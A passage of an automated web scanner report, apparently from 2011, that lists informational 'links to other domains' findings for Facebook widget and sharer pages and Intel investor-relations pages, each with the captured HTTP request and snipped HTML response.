  • http://c.static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js
  • http://c.static.ak.fbcdn.net/rsrc.php/yo/r/8Og39uOsjg5.css
  • http://e.static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico
  • http://f.static.ak.fbcdn.net/rsrc.php/yX/r/xDKZ0Z55ipf.css
  • http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs426.ash2/71095_22707976849_1530726_q.jpg
  • http://static.ak.fbcdn.net/rsrc.php/y9/r/jKEcVPZFk-2.gif

Request

GET /widgets/fan.php?api_key=4310e5850ea0577ea41506efdb019db0&channel_url=http%3A%2F%2Fnewsroom.intel.com%2Fcommunity%2Fintel_newsroom%2F%3Fiid%3Dftr%2Bpress%26fbc_channel%3D1&id=22707976849&name&width=223&connections=0&stream=true&logobar&css HTTP/1.1
Host: www.connect.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 05 Feb 2011 23:21:13 GMT
Content-Length: 9266

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>

<link type="text/css" rel="stylesheet" href="http://c.static.ak.fbcdn.net/rsrc.php/yo/r/8Og39uOsjg5.css" />
<link type="text/css" rel="stylesheet" href="http://f.static.ak.fbcdn.net/rsrc.php/yX/r/xDKZ0Z55ipf.css" />

<script type="text/javascript" src="http://c.static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js"></script>

<link rel="search" type="application/opensearchdescription+xml" href="http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://e.static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
...[SNIP]...
<a href="http://www.facebook.com/Intel" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs426.ash2/71095_22707976849_1530726_q.jpg" alt="Intel" /></a>
...[SNIP]...
<div class="page_stream_short" id="stream_content"><img class="loader img" src="http://static.ak.fbcdn.net/rsrc.php/y9/r/jKEcVPZFk-2.gif" width="32" height="32" /></div>
...[SNIP]...

17.23. http://www.facebook.com/sharer.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /sharer.php

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.facebook.com/sharer.php?u=
The response contains the following links to other domains:
  • http://b.static.ak.fbcdn.net/rsrc.php/yE/r/vKC7KTGk0BI.css
  • http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
  • http://b.static.ak.fbcdn.net/rsrc.php/yK/r/RUlAZi5mpi3.css
  • http://c.static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js
  • http://c.static.ak.fbcdn.net/rsrc.php/yn/r/kWdXCQd-hM5.css
  • http://c.static.ak.fbcdn.net/rsrc.php/yo/r/8Og39uOsjg5.css
  • http://e.static.ak.fbcdn.net/rsrc.php/yR/r/3ltOPQgcfkx.css
  • http://e.static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico
  • http://f.static.ak.fbcdn.net/rsrc.php/yX/r/xDKZ0Z55ipf.css
  • http://static.ak.fbcdn.net/rsrc.php/ye/r/ZveyUJsCpv8.css

Request

GET /sharer.php?u= HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=acZ6j; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fsharer.php%3Fu; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fsharer.php%3Fu; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 05 Feb 2011 23:21:09 GMT
Content-Length: 10831

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</noscript>
<link type="text/css" rel="stylesheet" href="http://f.static.ak.fbcdn.net/rsrc.php/yX/r/xDKZ0Z55ipf.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yK/r/RUlAZi5mpi3.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/ye/r/ZveyUJsCpv8.css" />
<link type="text/css" rel="stylesheet" href="http://e.static.ak.fbcdn.net/rsrc.php/yR/r/3ltOPQgcfkx.css" />
<link type="text/css" rel="stylesheet" href="http://c.static.ak.fbcdn.net/rsrc.php/yn/r/kWdXCQd-hM5.css" />
<link type="text/css" rel="stylesheet" href="http://c.static.ak.fbcdn.net/rsrc.php/yo/r/8Og39uOsjg5.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yE/r/vKC7KTGk0BI.css" />

<script type="text/javascript" src="http://c.static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js"></script>

<link rel="search" type="application/opensearchdescription+xml" href="http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://e.static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
...[SNIP]...

17.24. http://www.intc.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intc.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intc.com/?iid=gg_about+home_intc
The response contains the following links to other domains:
  • http://apps.shareholder.com/rss/rss.aspx?companyid=INTC&channels=5148
  • http://communities.intel.com/index.jspa?iid=hdr+communities
  • http://newsroom.intel.com/community/intel_newsroom/
  • http://techresearch.intel.com/articles/index.html?iid=subhdr+tl_research
  • http://www.intel.com/
  • http://www.intel.com/about/companyinfo/FAQ/index.htm
  • http://www.intel.com/about/companyinfo/capital/index.htm
  • http://www.intel.com/about/companyinfo/diversity/index.htm
  • http://www.intel.com/about/companyinfo/museum/index.htm
  • http://www.intel.com/about/companyinfo/policy/index.htm
  • http://www.intel.com/about/companyinfo/worldahead/index.htm
  • http://www.intel.com/business/index.htm?iid=hdr+business
  • http://www.intel.com/community/index.htm?iid=subhdr+cr_community
  • http://www.intel.com/consumer/index.htm?iid=hdr+home
  • http://www.intel.com/en_US/worldwide.htm
  • http://www.intel.com/experience/index.htm?iid=hdr+experience
  • http://www.intel.com/index.htm
  • http://www.intel.com/intel/companyinfo/index.htm?iid=subhdr+info
  • http://www.intel.com/intel/corpresponsibility/index.htm?iid=subhdr+cr
  • http://www.intel.com/intel/cr/gcr/overview.htm?iid=subhdr+cr_report
  • http://www.intel.com/intel/education/index.htm?iid=subhdr+cr_edu
  • http://www.intel.com/intel/environment/index.htm?iid=subhdr+cr_environ
  • http://www.intel.com/intel/foundation/index.htm?iid=subhdr+cr_foundation
  • http://www.intel.com/intel/index.htm?iid=hdr+about
  • http://www.intel.com/jobs/index.htm
  • http://www.intel.com/jobs/index.htm?iid=subhdr+info_jobs
  • http://www.intel.com/p/en_US/support?iid=hdr+support
  • http://www.intel.com/products/index.htm?iid=hdr+product-index
  • http://www.intel.com/sites/sitewide/en_US/privacy/privacy.htm?iid=ftr+privacy
  • http://www.intel.com/sites/sitewide/en_US/termsofuse.htm?iid=ftr+terms
  • http://www.intel.com/sites/sitewide/en_US/tradmarx.htm?iid=ftr+trademark
  • http://www.intel.com/standards/index.htm?iid=subhdr+tl_standards
  • http://www.intel.com/technology/architecture-silicon/index.htm?iid=subhdr+tl_arch-silicon
  • http://www.intel.com/technology/index.htm?iid=subhdr+tl
  • http://www.intel.com/technology/manufacturing/index.htm?iid=subhdr+tl_manufacturing
  • http://www.intel.com/technology/product/index.htm?iid=subhdr+tl_prod-tech
  • http://www.theinvestornetwork.com/forum/intc

Request

GET /?iid=gg_about+home_intc HTTP/1.1
Host: www.intc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 05 Feb 2011 23:14:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A05%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:06 GMT;path=/
Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:06 GMT;path=/
Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:14:06 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<meta name="Description" content="The Investor Relations home page website contains information about Intel business for stockholders, potential investors, and financial analysts.">        
   
           <link rel="alternate" type="application/rss+xml" title="Intel Investor News" href="http://apps.shareholder.com/rss/rss.aspx?companyid=INTC&channels=5148"/>
       
   <link rel="stylesheet" type="text/css" href="includes/tooltip.css" />
...[SNIP]...
<div id="gaat40-header" class="gaat40-reset gaat40-https">
<a class="gaat40-logo" title="" href="http://www.intel.com/index.htm">
               
               <script type="text/javascript">
...[SNIP]...
<li id="gaat40-locale">
<a href="http://www.intel.com/en_US/worldwide.htm">Change Location</a>
...[SNIP]...
<li class="gaat40-first" id="gaat40-hdr_link_bus">
<a href="http://www.intel.com/business/index.htm?iid=hdr+business">For Business</a>
...[SNIP]...
<li class="" id="gaat40-hdr_link_home">
<a href="http://www.intel.com/consumer/index.htm?iid=hdr+home">For Home</a>
...[SNIP]...
<li class="" id="gaat40-hdr_link_support">
<a href="http://www.intel.com/p/en_US/support?iid=hdr+support">Support</a>
...[SNIP]...
<li class=" gaat40-selected" id="gaat40-hdr_link_about">
<a href="http://www.intel.com/intel/index.htm?iid=hdr+about">About Intel</a>
...[SNIP]...
<li class="gaat40-first" id="gaat40-sbhdr_cr">
<a href="http://www.intel.com/intel/corpresponsibility/index.htm?iid=subhdr+cr">Corporate Responsibility</a>
...[SNIP]...
<li class="gaat40-first" id="gaat40-sbhdr_about_cr_col1_1">
<a href="http://www.intel.com/intel/cr/gcr/overview.htm?iid=subhdr+cr_report">Corporate Responsibility Report</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_cr_col1_2">
<a href="http://www.intel.com/intel/education/index.htm?iid=subhdr+cr_edu">Education</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_cr_col1_3">
<a href="http://www.intel.com/intel/environment/index.htm?iid=subhdr+cr_environ">Environment</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_cr_col1_4">
<a href="http://www.intel.com/about/companyinfo/capital/index.htm">Healthcare</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_cr_col1_5">
<a href="http://www.intel.com/intel/foundation/index.htm?iid=subhdr+cr_foundation">Intel Foundation</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_cr_col1_6">
<a href="http://www.intel.com/community/index.htm?iid=subhdr+cr_community">Intel in Your Community</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_cr_col1_7">
<a href="http://www.intel.com/about/companyinfo/worldahead/index.htm">World Ahead</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_info">
<a href="http://www.intel.com/intel/companyinfo/index.htm?iid=subhdr+info">Company Information</a>
...[SNIP]...
<li class="gaat40-first" id="gaat40-sbhdr_about_info_col1_1">
<a href="http://www.intel.com/about/companyinfo/diversity/index.htm">Diversity</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_info_col1_2">
<a href="http://www.intel.com/about/companyinfo/FAQ/index.htm">FAQs</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_info_col1_3">
<a href="http://www.intel.com/about/companyinfo/capital/index.htm">Intel Capital</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_info_col1_4">
<a href="http://www.intel.com/about/companyinfo/museum/index.htm">Intel Museum</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_info_col1_6">
<a href="http://www.intel.com/jobs/index.htm?iid=subhdr+info_jobs">Jobs at Intel</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_info_col1_7">
<a href="http://newsroom.intel.com/community/intel_newsroom/">Intel Newsroom</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_info_col1_8">
<a href="http://www.intel.com/about/companyinfo/policy/index.htm">Public Policy</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_tech-lead">
<a href="http://www.intel.com/technology/index.htm?iid=subhdr+tl">Technology Leadership</a>
...[SNIP]...
<li class="gaat40-first" id="gaat40-sbhdr_about_tech-lead_col1_1">
<a href="http://www.intel.com/technology/architecture-silicon/index.htm?iid=subhdr+tl_arch-silicon">Architecture and Silicon</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_tech-lead_col1_2">
<a href="http://www.intel.com/technology/product/index.htm?iid=subhdr+tl_prod-tech">Product Technologies</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_tech-lead_col1_3">
<a href="http://www.intel.com/technology/manufacturing/index.htm?iid=subhdr+tl_manufacturing">Manufacturing</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_tech-lead_col1_4">
<a href="http://techresearch.intel.com/articles/index.html?iid=subhdr+tl_research">Research</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_tech-lead_col1_5">
<a href="http://www.intel.com/standards/index.htm?iid=subhdr+tl_standards">Standards</a>
...[SNIP]...
<li class="gaat40-first">
<a href="http://www.intel.com/products/index.htm?iid=hdr+product-index">Product Index</a>
...[SNIP]...
<li class="">
<a href="http://communities.intel.com/index.jspa?iid=hdr+communities">Communities</a>
...[SNIP]...
<li class="">
<a href="http://www.intel.com/experience/index.htm?iid=hdr+experience">Experience Intel</a>
...[SNIP]...
</span>

                       <a href="http://newsroom.intel.com/community/intel_newsroom/">INTEL NEWSROOM</a>

                       <a href="http://www.intel.com/jobs/index.htm">JOBS AT INTEL</a>
                       
                       <a href="http://www.intel.com/about/companyinfo/capital/index.htm">INTEL CAPITAL</a>
                       
                       <a href="http://www.intel.com/about/companyinfo/diversity/index.htm">DIVERSITY</a>
                       
                       <a href="http://www.intel.com/about/companyinfo/museum/index.htm">INTEL MUSEUM</a>
                       
                       <a href="http://www.intel.com/about/companyinfo/policy/index.htm">Public Policy</a>
                       
                       <a href="http://www.intel.com/about/companyinfo/FAQ/index.htm">F.A.Q.<span class="lowercase">
...[SNIP]...
<li><a href="http://www.intel.com/" title="Home">Home</a>
...[SNIP]...
<li><a href="http://www.intel.com/intel/index.htm?iid=hdr+about" title="About Intel">About&nbsp;Intel</a>
...[SNIP]...
<div class="mini-promo-text">
                               <a href="http://www.theinvestornetwork.com/forum/intc" title="Join the Intel Investors Community" target="_blank">Join the Intel Investors Community&nbsp;&gt;</a>
...[SNIP]...
<li class="gaat40-first">
<a href="http://www.intel.com/sites/sitewide/en_US/termsofuse.htm?iid=ftr+terms">Terms of Use</a>
...[SNIP]...
<li>
<a href="http://www.intel.com/sites/sitewide/en_US/tradmarx.htm?iid=ftr+trademark">*Trademarks</a>
...[SNIP]...
<li>
<a href="http://www.intel.com/sites/sitewide/en_US/privacy/privacy.htm?iid=ftr+privacy">Privacy</a>
...[SNIP]...

17.25. http://www.intc.com/common/mobile/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intc.com
Path:   /common/mobile/

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intc.com/common/mobile/?CompanyID=INTC
The response contains the following links to other domains:
  • http://investor.shareholder.com/common/alerts/INTC/default/logo.gif
  • https://charts.edgar-online.com/ext/charts.dll?2-4-e-0-0-53-03NA000000INTC&fs-100-SF:1|2|5|3-BG=ffffff-BG1=ffffff-BG2=ffffff-FF:A18=ffffff|A33=ffffff-ht=125-wd=240-FT:0=2-HO:SW|SE|NW|NE-AP:9=2|10=2-FB:1=B6C1D0-FL:2=990033-FF:2=990033-FL:3=009900-FF:3=009900-FL:1=768AA6-FF:1=768AA6-FL:18=768AA6-FF:18=768AA6-FL:5=009900-FF:5=009900-HC:2-AT:9=0-FI:-FTC:A17=FFFFFF

Request

GET /common/mobile/?CompanyID=INTC HTTP/1.1
Host: www.intc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 05 Feb 2011 23:16:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A16%3A02%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:16:02 GMT;path=/
Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:16:02 GMT;path=/
Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:16:02 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd">

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8
...[SNIP]...
<div class="sh_logo">
<img src="http://investor.shareholder.com/common/alerts/INTC/default/logo.gif" alt="Intel Corp. Logo" border="0" />
</div>
...[SNIP]...
<div>
<img id="pricechart" border="0" src="https://charts.edgar-online.com/ext/charts.dll?2-4-e-0-0-53-03NA000000INTC&fs-100-SF:1|2|5|3-BG=ffffff-BG1=ffffff-BG2=ffffff-FF:A18=ffffff|A33=ffffff-ht=125-wd=240-FT:0=2-HO:SW|SE|NW|NE-AP:9=2|10=2-FB:1=B6C1D0-FL:2=990033-FF:2=990033-FL:3=009900-FF:3=009900-FL:1=768AA6-FF:1=768AA6-FL:18=768AA6-FF:18=768AA6-FL:5=009900-FF:5=009900-HC:2-AT:9=0-FI:-FTC:A17=FFFFFF" alt="Stock price graph" title="" />
</div>
...[SNIP]...

17.26. http://www.intc.com/eventdetail.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intc.com
Path:   /eventdetail.cfm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intc.com/eventdetail.cfm?EventID=92109
The response contains the following links to other domains:
  • http://communities.intel.com/index.jspa?iid=hdr+communities
  • http://newsroom.intel.com/community/intel_newsroom/
  • http://techresearch.intel.com/articles/index.html?iid=subhdr+tl_research
  • http://www.intel.com/
  • http://www.intel.com/about/companyinfo/FAQ/index.htm
  • http://www.intel.com/about/companyinfo/capital/index.htm
  • http://www.intel.com/about/companyinfo/diversity/index.htm
  • http://www.intel.com/about/companyinfo/museum/index.htm
  • http://www.intel.com/about/companyinfo/policy/index.htm
  • http://www.intel.com/about/companyinfo/worldahead/index.htm
  • http://www.intel.com/business/index.htm?iid=hdr+business
  • http://www.intel.com/community/index.htm?iid=subhdr+cr_community
  • http://www.intel.com/consumer/index.htm?iid=hdr+home
  • http://www.intel.com/en_US/worldwide.htm
  • http://www.intel.com/experience/index.htm?iid=hdr+experience
  • http://www.intel.com/index.htm
  • http://www.intel.com/intel/companyinfo/index.htm?iid=subhdr+info
  • http://www.intel.com/intel/corpresponsibility/index.htm?iid=subhdr+cr
  • http://www.intel.com/intel/cr/gcr/overview.htm?iid=subhdr+cr_report
  • http://www.intel.com/intel/education/index.htm?iid=subhdr+cr_edu
  • http://www.intel.com/intel/environment/index.htm?iid=subhdr+cr_environ
  • http://www.intel.com/intel/foundation/index.htm?iid=subhdr+cr_foundation
  • http://www.intel.com/intel/index.htm?iid=hdr+about
  • http://www.intel.com/jobs/index.htm
  • http://www.intel.com/jobs/index.htm?iid=subhdr+info_jobs
  • http://www.intel.com/p/en_US/support?iid=hdr+support
  • http://www.intel.com/products/index.htm?iid=hdr+product-index
  • http://www.intel.com/sites/sitewide/en_US/privacy/privacy.htm?iid=ftr+privacy
  • http://www.intel.com/sites/sitewide/en_US/termsofuse.htm?iid=ftr+terms
  • http://www.intel.com/sites/sitewide/en_US/tradmarx.htm?iid=ftr+trademark
  • http://www.intel.com/standards/index.htm?iid=subhdr+tl_standards
  • http://www.intel.com/technology/architecture-silicon/index.htm?iid=subhdr+tl_arch-silicon
  • http://www.intel.com/technology/index.htm?iid=subhdr+tl
  • http://www.intel.com/technology/manufacturing/index.htm?iid=subhdr+tl_manufacturing
  • http://www.intel.com/technology/product/index.htm?iid=subhdr+tl_prod-tech
  • http://www.theinvestornetwork.com/forum/intc

Request

GET /eventdetail.cfm?EventID=92109 HTTP/1.1
Host: www.intc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 05 Feb 2011 23:14:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A48%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:48 GMT;path=/
Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:48 GMT;path=/
Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:14:48 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<div id="gaat40-header" class="gaat40-reset gaat40-https">
<a class="gaat40-logo" title="" href="http://www.intel.com/index.htm">
               
               <script type="text/javascript">
...[SNIP]...
<li id="gaat40-locale">
<a href="http://www.intel.com/en_US/worldwide.htm">Change Location</a>
...[SNIP]...
<li class="gaat40-first" id="gaat40-hdr_link_bus">
<a href="http://www.intel.com/business/index.htm?iid=hdr+business">For Business</a>
...[SNIP]...
<li class="" id="gaat40-hdr_link_home">
<a href="http://www.intel.com/consumer/index.htm?iid=hdr+home">For Home</a>
...[SNIP]...
<li class="" id="gaat40-hdr_link_support">
<a href="http://www.intel.com/p/en_US/support?iid=hdr+support">Support</a>
...[SNIP]...
<li class=" gaat40-selected" id="gaat40-hdr_link_about">
<a href="http://www.intel.com/intel/index.htm?iid=hdr+about">About Intel</a>
...[SNIP]...
<li class="gaat40-first" id="gaat40-sbhdr_cr">
<a href="http://www.intel.com/intel/corpresponsibility/index.htm?iid=subhdr+cr">Corporate Responsibility</a>
...[SNIP]...
<li class="gaat40-first" id="gaat40-sbhdr_about_cr_col1_1">
<a href="http://www.intel.com/intel/cr/gcr/overview.htm?iid=subhdr+cr_report">Corporate Responsibility Report</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_cr_col1_2">
<a href="http://www.intel.com/intel/education/index.htm?iid=subhdr+cr_edu">Education</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_cr_col1_3">
<a href="http://www.intel.com/intel/environment/index.htm?iid=subhdr+cr_environ">Environment</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_cr_col1_4">
<a href="http://www.intel.com/about/companyinfo/capital/index.htm">Healthcare</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_cr_col1_5">
<a href="http://www.intel.com/intel/foundation/index.htm?iid=subhdr+cr_foundation">Intel Foundation</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_cr_col1_6">
<a href="http://www.intel.com/community/index.htm?iid=subhdr+cr_community">Intel in Your Community</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_cr_col1_7">
<a href="http://www.intel.com/about/companyinfo/worldahead/index.htm">World Ahead</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_info">
<a href="http://www.intel.com/intel/companyinfo/index.htm?iid=subhdr+info">Company Information</a>
...[SNIP]...
<li class="gaat40-first" id="gaat40-sbhdr_about_info_col1_1">
<a href="http://www.intel.com/about/companyinfo/diversity/index.htm">Diversity</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_info_col1_2">
<a href="http://www.intel.com/about/companyinfo/FAQ/index.htm">FAQs</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_info_col1_3">
<a href="http://www.intel.com/about/companyinfo/capital/index.htm">Intel Capital</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_info_col1_4">
<a href="http://www.intel.com/about/companyinfo/museum/index.htm">Intel Museum</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_info_col1_6">
<a href="http://www.intel.com/jobs/index.htm?iid=subhdr+info_jobs">Jobs at Intel</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_info_col1_7">
<a href="http://newsroom.intel.com/community/intel_newsroom/">Intel Newsroom</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_info_col1_8">
<a href="http://www.intel.com/about/companyinfo/policy/index.htm">Public Policy</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_tech-lead">
<a href="http://www.intel.com/technology/index.htm?iid=subhdr+tl">Technology Leadership</a>
...[SNIP]...
<li class="gaat40-first" id="gaat40-sbhdr_about_tech-lead_col1_1">
<a href="http://www.intel.com/technology/architecture-silicon/index.htm?iid=subhdr+tl_arch-silicon">Architecture and Silicon</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_tech-lead_col1_2">
<a href="http://www.intel.com/technology/product/index.htm?iid=subhdr+tl_prod-tech">Product Technologies</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_tech-lead_col1_3">
<a href="http://www.intel.com/technology/manufacturing/index.htm?iid=subhdr+tl_manufacturing">Manufacturing</a>
